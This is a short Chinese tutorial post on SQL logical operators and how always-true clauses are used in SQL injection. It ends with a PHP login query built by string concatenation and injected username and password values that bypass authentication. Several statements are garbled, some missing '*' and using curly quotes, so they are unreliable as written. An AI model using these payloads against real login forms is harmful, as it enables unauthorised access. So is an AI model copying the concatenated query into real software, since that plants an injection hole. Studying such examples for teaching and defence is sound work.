1.逻辑运算符
与:select * from users where uname=‘huangxifeng’ and age>30; select 1 &&2;
或:select * from users where uname=‘huangxifeng’ or password=‘abc123’
非:select * from users where uname not in(‘huangxifeng’)
异或:select 1 xor 2;#### 2.复杂逻辑与注入逻辑关系 不变逻辑: select from users where uid=10003 and uname=’admin’ and 1=1; select from users where uid=10003 and uname=’admin’ or 1=2; select * from users where uname=’admin’&&!!!!!!!1;
空集逻辑: select from users where uid=10003 and uname=’admin’ and 1=2; select from users where uid=10003 and uname=’admin’ and 0=true; select * from users where uname=’admin’&&!1;
全集逻辑: select from users where uid=10003 and uname=’admin’ or 1=1; select from users where uname=’admin‘ or !!!1; select * from users where uname=’admin‘ or !!!1=~~2;
类似: !!!2=~~2 ‘’=‘’ select from users where uname=’admin’&&!!!!!!!1;#### 3.全集逻辑绕过密码验证 PHP代码: $sql=“ select from users where uname=“.$uname.” and password=“.$password
正常传参:$uname=‘huangxifeng’ $password=‘hxfabc’ 结果:select * from users where uname=‘huangxifeng’ and password=‘hxfabc’
注入传参:$uname=‘’ or ’1’=’1 — and ‘!!!2=~~’2 And ‘0’=‘0 And password=‘’=‘ 结果: select from users where uname=‘’ or ’1’=’1’ —and password=‘hxfabc’ select from users where uname=’admin’ and password=’’=’’; select * from users where uname=’admin’ and ‘0’=‘0’;
若有收获,就点个赞吧
0 人点赞
